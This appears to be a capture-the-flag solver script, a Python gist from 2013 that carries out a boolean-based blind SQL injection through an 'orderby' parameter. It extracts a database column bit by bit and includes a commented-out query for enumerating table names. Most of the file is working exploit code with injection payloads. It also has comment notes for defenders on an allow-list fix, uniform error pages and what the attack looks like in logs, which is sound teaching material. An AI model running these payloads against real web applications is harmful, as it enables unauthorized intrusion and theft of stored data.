
anonymous /bitcoinctf_exploit2.py Secret
Created May 4, 2013

import requests
import string
import sys
# Solver script for a CTF challenge: a boolean-based blind SQL injection through
# the `orderby` request parameter. It is a worked example of what happens when a
# sort expression is concatenated into the SQL text instead of being mapped from
# an allow-list of column names.
#
# How it reads data: for each character position it sends eight requests, one
# per bit, and uses a difference in the response body (does it start with
# "Unknown"?) as a one-bit answer. Which server-side condition produces that
# text is not visible here; presumably it is an error message (TODO confirm).
#
# Defender notes:
#   - ORDER BY cannot take a bound parameter, so the fix is to translate the
#     user's choice into a fixed set of column names and reject anything else.
#   - Returning the same generic page for every failure removes the response
#     difference that this technique depends on.
#   - In access logs this shows up as a burst of near-identical requests whose
#     `orderby` value holds parentheses, `select`, `union` and `substring`.
url = "http://www.bitcoinctf.com/"
page = "b00km4rks.php?orderby=(%s)&limit=1"
# Table names
# query = "(select(table_name)from(information_schema.tables)where((ord(substring(table_name,1,1))>90)and(substring(table_name,%s,1)='%s'))union(select(1)))"
# Bookmarks
query = "(select(addedby)from(urls)where((deleted=2)and(ord(substring(addedby,%s,1))%s26%s=%s))union(select(1)))"

# Character positions 1..37 of the `addedby` column.
for position in range(1, 38):
    code_point = 0
    # Rebuild the character's ordinal one bit at a time (bits 0..7).
    for bit in range(8):
        mask = 1 << bit
        # The literal '%' joins the "26" in the template to form %26, the
        # URL-encoded '&', so the server evaluates ord(...) & mask = mask.
        probe = query % (position, '%', mask, mask)
        response = requests.get(url + page % probe)
        # A body starting with "Unknown" is counted as "this bit is set".
        if response.text.startswith("Unknown"):
            code_point += mask
    # No bit set is treated as the end of the value.
    if code_point == 0:
        print("END")
        break
    # One recovered character per output line. The parenthesised form prints
    # the same text under the Python 2 interpreter this script was written for.
    print(chr(code_point))